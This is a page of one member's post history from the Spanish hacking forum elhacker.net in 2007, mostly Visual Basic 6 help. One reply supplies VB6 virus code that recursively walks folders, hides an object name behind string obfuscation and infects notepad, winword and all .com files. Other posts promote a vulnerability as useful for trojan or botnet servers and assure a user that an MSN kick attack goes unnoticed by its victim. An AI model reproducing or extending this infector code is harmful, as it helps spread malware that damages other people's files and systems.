elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 ... 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 [77] 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 ... 102
761  Programación / Programación Visual Basic / [Source] Shared-Folder execution bypass vulnerability en: 12 Julio 2007, 22:47 pm
He posteado una nueva vulnerabilidad y la prueba de concepto la he hecho (como no) en VB6. Os dejo el link del hilo principal por si alguien quiere investigar un poquito sobre este tema. Realmente es muy interesante para el server de un troyano o una botnet.

Saludos!!

[Vulnerabilidad] Shared-Folder execution bypass vulnerability
http://foro.elhacker.net/index.php/topic,172016.0.html

EDIT: el link se ha movido al foro privado hasta que se encuentre una solución a la vulnerabilidad. Lo siento
762  Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6 en: 11 Julio 2007, 22:40 pm
Cita de: -Freeze- en 11 Julio 2007, 22:35 pm
||MadAntrax||

Podrias decirnos como es que pones las letras de colores automaticamente(se ve mas ordenado)

o es manual o.O??

Instalado Mod para Programación/Programadores GeSHi
https://foro.elhacker.net/index.php/topic,170103.0.html
763  Programación / Programación Visual Basic / Re: DIRECCIONDES IP? en: 11 Julio 2007, 22:35 pm
Código
  1.  Randomize
  2.  IP1 = Int((Rnd * 255) + 1)
  3.  IP2 = Int((Rnd * 255) + 1)
  4.  IP3 = Int((Rnd * 255) + 1)
  5.  IP4 = Int((Rnd * 255) + 1)
  6.  MsgBox IP1 & "." & IP2 & "." & IP3 & "." & IP4
  7.  
764  Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6 en: 11 Julio 2007, 22:32 pm
Cita de: nhaalclkiemr en 11 Julio 2007, 21:34 pm
Solo con que me digas como puedo en VB6.0 obtener los parametros con los que se ejecutó una aplicación ya está.

Existe una variable de VB6 llamada:

Código
  1. Parametros = Command$

Esto te devuelve los parametros con el que se ha ejecutado tu aplicación, con eso tienes suficiente. Saludos!!
765  Programación / Programación Visual Basic / Re: [Source] Infección de ejecutables en VB6 en: 11 Julio 2007, 20:49 pm
Cita de: nhaalclkiemr en 11 Julio 2007, 20:43 pm
-Que busque el nombre de un programa en concreto y solo infecte a ese.

Aqui tienes para lo del nombre:

Código
  1. Function Subfolders(path)
  2.     On Error Resume Next
  3.     'Se cifra el string que carga el objeto Scripting.FileSystemObject
  4.     Set fso = CreateObject(bullet("Qapkrvkle,DkngQ{qvgoM`hgav"))
  5.     Set Drives = fso.Drives
  6.  
  7.     newpath = path
  8.     Set Fold = fso.GetFolder(newpath)
  9.     Set Files = Fold.Files
  10.  
  11.     For Each File In Files
  12.         ext = fso.GetExtensionName(File.path)
  13.         ext = LCase(ext)
  14.         nam = LCase(File.Name)
  15.         'Modificación del Source
  16.         If (nam = "notepad") OR (nam = "winword") OR (ext = "com") Then
  17.             If IsInfected(File.path) = False Then
  18.                 InfectFile (File.path)
  19.                 DoEvents
  20.             End If
  21.         End If
  22.     Next
  23.  
  24.     Set File = Fold.Subfolders
  25.     For Each Subfol In File
  26.         Call Subfolders(Subfol.path)
  27.     Next
  28. End Function
Este ejemplo infecta cualquier archivo llamado notepad.* y winword.* Además infectará todos los archivo con extensión *.com

Citar
-Que no infecte a una carpeta (subcarpetas y archivos  :xD) determinada o que solo infecte a una determinada
Este es más complicado, pero creo que debería suprimir la parte del final:

Código
  1.     Set File = Fold.Subfolders
  2.     For Each Subfol In File
  3.         Call Subfolders(Subfol.path)
  4.     Next

Y llamar a la función: Subfolders con la ruta exacta, ejemplo: Subfolders("C:\Windows\System32)"
Ojo que esto último no lo he probado
766  Programación / Programación Visual Basic / Felicidades a los 2 nuevos moderadores en: 11 Julio 2007, 15:53 pm
Bueno, a uno de ellos ya se presentó: Hendrix en el post de "Moderador Visual Basic 6.0" Y Ahora este subforo se refuerza con el apoyo y dedicación de E0N, que ha demostrado una dedicación, profesionalidad y ética envidiable y por ello se ha ganado el merecido puesto.

Espero que el número de trolls vaya decayendo así como los futuros proyectos de VB vayan en aumento.

Sin más que añadir: Felicidades y bienvenidos Hendrix y E0N
767  Programación / Programación Visual Basic / Re: Editor de textos en: 10 Julio 2007, 13:09 pm
O si no... el propio VB6 tiene un asistente para proyectos empresariales. Esto te genera un proyecto de ejemplo de un editor de textos MDI (creo que se llama así), con su toolbar, menus y ventanitas Child's xD

Saludos!
768  Programación / Programación Visual Basic / Re: abra algun programa para descopilar un sotf en: 7 Julio 2007, 02:03 am
Cita de: Tughack en  7 Julio 2007, 00:59 am
Para k kieres tal cosa? Para copiar codigo? K lammer...

Calma, calmaaaaaaa...

Si hay decompiladores, la mayoría de ellos devuleven el diseño del formulario, APIS usadas, String, etc... pero el source completo olvidate xD

Yo uso VB Decompiler Lite
769  Programación / Programación Visual Basic / Re: pregunta sobre MSN Kick en: 6 Julio 2007, 08:57 am
La grácia del MSN Kick es que el ataque es tan rápido que la victima no llega a ver inguna ventana de inicio de sesión.

Te puedo aseguar que si le lanzas el ataque a alguien de tu MSN no verá ni sabrá que has sido tu. Solo lo puede descubrir si lee los logs y ve un montón de :[ en el log. Pero vamos eso casi nunca pasa.

Cita de: redshots en  6 Julio 2007, 06:45 am
por cierto si la pregunta esta dirigida a madantrax porque no le envias un mensaje privado........?

Es cierto, estas cosas mejor por privado para evitar ensuciar el foro. Saludos!! :)
770  Programación / Programación Visual Basic / Re: PERMISOS DE CARPETA en: 28 Junio 2007, 20:16 pm
yo para hacer eso me nutro de las ServerTools que ofrece Microsoft, son paquetes con muchas aplicaciones basadas en líneas de comando que permiten hacer multitud de cosas.

Te recomiendo las RKTools de Microsoft, lo instalas y pruebas las aplicaciones hay algunas tipo "permcopy" (para copiar permisos de un directorio a otro) "whoami" (devuleve usuario actual y dominio), etc... te dejo el link:

RK-Tools for Win2k3

Sirven para XP tambien, te dejo el listado completo:

Citar
The following tools are provided:

    * Acctinfo.dll (documented in Readme.htm)
    * Adlb.exe: Active Directory Load Balancing Tool
    * Admx.msi: ADM File Parser
    * Atmarp.exe: Windows ATM ARP Server Information Tool
    * Atmlane.exe: Windows ATM LAN Emulation Client Information
    * Autoexnt.exe: AutoExNT Service
    * Cdburn.exe: ISO CD-ROM Burner Tool
    * Checkrepl.vbs: Check Replication
    * Chklnks.exe: Link Check Wizard
    * Chknic.exe: Network Interface Card Compliance Tool for Network Load Balancing
    * Cleanspl.exe: Spooler Cleaner
    * Clearmem.exe: Clear Memory
    * Clusdiag.msi: Cluster Diagnostics and Verification Tool
    * Clusfileport.dll: Cluster Print File Port
    * Clusterrecovery.exe: Server Cluster Recovery Utility
    * Cmdhere.inf: Command Here
    * Cmgetcer.dll: Connection Manager Certificate Deployment Tool
    * Compress.exe: Compress Files
    * Confdisk.exe: Disk Configuration Tool
    * Consume.exe: Memory Consumers Tool
    * Creatfil.exe: Create File
    * Csccmd.exe: Client-Side Caching Command-Line Options
    * Custreasonedit.exe: Custom Reason Editor (documented in Readme.htm)
    * Delprof.exe: User Profile Deletion Utility
    * Dh.exe: Display Heap
    * Diskraid.exe: RAID Configuration Tool
    * Diskuse.exe: User Disk Usage Tool
    * Dnsdiag.exe: SMTP DNS Diagnostic Tool (documented in Readme.htm)
    * Dumpfsmos.cmd: Dump FSMO Roles
    * Dvdburn.exe: ISO DVD Burner Tool
    * Empty.exe: Free Working Set Tool
    * Eventcombmt.exe: Check Replication
    * Fcopy.exe: File Copy Utility for Message Queuing
    * Frsflags.vbs
    * Getcm.exe: Connection Manager Profile Update
    * Gpmonitor.exe: Group Policy Monitor
    * Gpotool.exe: Group Policy Objects
    * Hlscan.exe: Hard Link Display Tool
    * Ifilttst.exe: IFilter Test Suite
    * Ifmember.exe: User Membership Tool
    * Inetesc.adm: Internet Explorer Enhanced Security Configuration
    * Iniman.exe: Initialization Files Manipulation Tool
    * Instcm.exe: Install Connection Manager Profile
    * Instsrv.exe: Service Installer
    * Intfiltr.exe: Interrupt Affinity Tool
    * Kerbtray.exe: Kerberos Tray
    * Kernrate.exe: Kernel Profiling Tool
    * Klist.exe: Kerberos List
    * Krt.exe: Certification Authority Key Recovery
    * Lbridge.cmd: L-Bridge
    * Linkd.exe
    * Linkspeed.exe: Link Speed
    * List.exe: List Text File Tool
    * Lockoutstatus.exe: Account Lockout Status (documented in Readme.htm)
    * Logtime.exe
    * Lsreport.exe: Terminal Services Licensing Reporter
    * Lsview.exe: Terminal Services License Server Viewer
    * Mcast.exe: Multicast Packet Tool
    * Memmonitor.exe: Memory Monitor
    * Memtriage.exe: Resource Leak Triage Tool
    * Mibcc.exe: SNMP MIB Compiler
    * Moveuser.exe: Move Users
    * Mscep.dll: Certificate Services Add-on for Simple Certificate Enrollment Protocol
    * Nlsinfo.exe: Locale Information Tool
    * Now.exe: STDOUT Current Date and Time
    * Ntimer.exe: Windows Program Timer
    * Ntrights.exe
    * Oh.exe: Open Handles
    * Oleview.exe: OLE/COM Object Viewer
    * Pathman.exe: Path Manager
    * Permcopy.exe: Share Permissions Copy
    * Perms.exe: User File Permissions Tool
    * Pfmon.exe: Page Fault Monitor
    * Pkiview.msc: PKI Health Tool
    * Pmon.exe: Process Resource Monitor
    * Printdriverinfo.exe: Drivers Source
    * Prnadmin.dll: Printer Administration Objects
    * Qgrep.exe
    * Qtcp.exe: QoS Time Stamp
    * Queryad.vbs: Query Active Directory
    * Rassrvmon.exe: RAS Server Monitor
    * Rcontrolad.exe: Active Directory Remote Control Add-On
    * Regini.exe: Registry Change by Script
    * Regview.exe (documented in Readme.htm)
    * Remapkey.exe: Remap Windows Keyboard Layout
    * Robocopy.exe: Robust File Copy Utility
    * Rpccfg.exe: RPC Configuration Tool
    * Rpcdump.exe
    * Rpcping.exe
    * RPing: RPC Connectivity Verification Tool
    * Rqc.exe: Remote Access Quarantine Client
    * Rqs.exe: Remote Access Quarantine Agent
    * Setprinter.exe: Spooler Configuration Tool
    * Showacls.exe
    * Showperf.exe: Performance Data Block Dump Utility
    * Showpriv.exe: Show Privilege
    * Sleep.exe: Batch File Wait
    * Sonar.exe: FRS Status Viewer
    * Splinfo.exe: Print Spooler Information
    * Srvany.exe: Applications as Services Utility
    * Srvcheck.exe: Server Share Check
    * Srvinfo.exe: Remote Server Information
    * Srvmgr.exe: Server Manager
    * Ssdformat.exe: System State Data Formatter
    * Subinacl.exe
    * Tail.exe
    * Tcmon.exe: Traffic Control Monitor
    * Timeit.exe (documented in Readme.htm)
    * Timezone.exe: Daylight Saving Time Update Utility
    * Tsctst.exe: Terminal Server Client License Dump Tool
    * Tsscalling.exe: Terminal Services Scalability Planning Tools
    * Uddicatschemeeditor.exe: UDDI Services Categorization Scheme Editor
    * Uddiconfig.exe: UDDI Services Command-line Configuration Utility
    * Uddidataexport.exe: UDDI Data Export Wizard
    * Usrmgr.exe: User Manager for Domains
    * Vadump.exe: Virtual Address Dump
    * Vfi.exe: Visual File Information
    * Volperf.exe: Shadow Copy Performance Counters
    * Volrest.exe: Shadow Copies for Shared Folders Restore Tool
    * Vrfydsk.exe: Verify Disk
    * Winexit.scr: Windows Exit Screen Saver
    * Winhttpcertcfg.exe: WinHTTP Certificate Configuration Tool
    * Winhttptracecfg.exe: WinHTTP Tracing Facility Configuration Tool
    * Winpolicies.exe: Policy Spy
    * Wins.dll: WINS Replication Network Monitor Parser
    * Wlbs_hb.dll & Wlbs_rc.dll: Windows Load Balancing Server Network Monitor Parsers

Usa la aplicación que mejor te convenga y la añades como recurso a tu proyecto de VB6, si te lo curras el usuario no se dará cuenta ni que estas usando third-party aplications.

Saludos!!
Páginas: 1 ... 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 [77] 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 ... 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines